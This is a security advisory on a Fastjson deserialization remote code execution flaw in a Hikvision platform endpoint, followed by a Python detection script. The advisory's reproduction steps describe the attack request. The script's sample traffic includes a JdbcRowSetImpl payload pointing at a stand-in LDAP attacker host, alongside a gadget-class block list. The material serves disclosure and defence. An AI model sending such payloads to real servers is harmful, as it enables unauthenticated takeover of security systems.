Hikvision Integrated Security Management Platform Remote Code Execution Vulnerability in applyCT Component
Vulnerability
A remote code execution vulnerability has been identified in the applyCT component of the Hikvision Integrated Security Management Platform. It arises from the use of an outdated version of the Fastjson library that deserializes untrusted user input. Exploitation relies on Fastjson's auto-type feature, which lets the JSON document itself name the Java class to instantiate. By referencing a malicious class through an LDAP URL, an attacker can execute arbitrary code on the underlying system.
Impact
Exploitation of this vulnerability allows unauthenticated remote code execution on the server where the Hikvision Integrated Security Management Platform is running.
Reproduction
To reproduce this vulnerability, send a POST request to the '/bic/ssoService/v1/applyCT' endpoint with a JSON payload that includes the '@type' attribute set to 'java.lang.Class' and a value that references a malicious class, such as 'com.sun.rowset.JdbcRowSetImpl'. Include another parameter that specifies an LDAP URL pointing to an untrusted server. This payload will trigger the deserialization process and execute the referenced class, achieving remote code execution.
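Detection logic for the request pattern described above, written for this page as an added example (it is not code from Hikvision or from the advisory source). It inspects request bodies sent to the applyCT endpoint for Fastjson type hints and JNDI URLs, walking nested objects so a hint buried inside a sub-object is still seen, and treating a body that Python cannot parse but that still contains `"@type"` as suspicious rather than benign, because Fastjson's parser is more lenient than Python's. The endpoint path and the two class names come from the advisory; the `rmi://` scheme, the field names in the sample traffic and the block/alert thresholds are assumptions made here.

```python
import json
import re

# Endpoint named in the advisory; a legitimate applyCT request should never
# need Fastjson type hints, so any "@type" key on this path is suspicious.
APPLYCT_PATH = "/bic/ssoService/v1/applyCT"

# Class names the advisory mentions. Deliberately short and illustrative;
# a production rule would carry a fuller list of known gadget classes.
SUSPICIOUS_TYPES = {
    "java.lang.Class",
    "com.sun.rowset.JdbcRowSetImpl",
}

# JNDI URL schemes. "ldap" comes from the advisory; "rmi" is added here as an
# assumption because it is the other scheme JNDI lookups commonly accept.
JNDI_URL = re.compile(r"^(ldap|ldaps|rmi)://", re.IGNORECASE)

# Fallback for bodies that json.loads rejects: Fastjson tolerates input that
# Python's parser does not, so a malformed body is not automatically safe.
RAW_TYPE_HINT = re.compile(r'"@type"\s*:', re.IGNORECASE)


def _walk(node, path, findings):
    """Recursively visit a parsed JSON value and collect indicators."""
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{path}.{key}" if path else key
            if key == "@type":
                findings.append(f"type hint at {here}")
                if isinstance(value, str) and value in SUSPICIOUS_TYPES:
                    findings.append(f"suspicious class {value} at {here}")
            if isinstance(value, str) and JNDI_URL.match(value):
                findings.append(f"JNDI URL at {here}")
            _walk(value, here, findings)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            _walk(item, f"{path}[{i}]", findings)


def inspect_request(path, body):
    """Return the list of findings for one HTTP request to the platform.

    Only the applyCT endpoint is inspected, since that is what the advisory
    covers. An empty list means no rule in this set matched.
    """
    if path != APPLYCT_PATH:
        return []
    findings = []
    try:
        parsed = json.loads(body)
    except ValueError:
        if RAW_TYPE_HINT.search(body):
            findings.append("unparseable body containing @type hint")
        return findings
    _walk(parsed, "", findings)
    return findings


def classify(findings):
    """Collapse findings into a verdict: 'block', 'alert' or 'allow'."""
    if any(f.startswith(("suspicious class", "JNDI URL")) for f in findings):
        return "block"
    if findings:
        return "alert"
    return "allow"


# Constructed sample traffic for demonstration; not captured from any real
# system. Field names in the benign request are assumptions.
SAMPLE_REQUESTS = [
    (APPLYCT_PATH, '{"sessionId": "abc123", "clientIp": "10.0.0.5"}'),
    (APPLYCT_PATH, '{"@type": "com.sun.rowset.JdbcRowSetImpl", '
                   '"dataSourceName": "ldap://attacker.invalid/x"}'),
    (APPLYCT_PATH, '{"a": {"b": {"@type": "com.example.Unknown"}}}'),
    (APPLYCT_PATH, '{"@type": "x", unterminated'),
    ("/bic/other", '{"@type": "com.sun.rowset.JdbcRowSetImpl"}'),
]

if __name__ == "__main__":
    for req_path, req_body in SAMPLE_REQUESTS:
        result = inspect_request(req_path, req_body)
        print(req_path, classify(result), result)
```

Run as a script it prints one verdict per constructed request: the plain applyCT request is allowed, the one carrying a known gadget class and an LDAP URL is blocked, the nested unknown type hint and the malformed body each raise an alert, and the request to a different path is ignored. The same two functions can be dropped into a WAF rule engine or a log-replay job over captured request bodies.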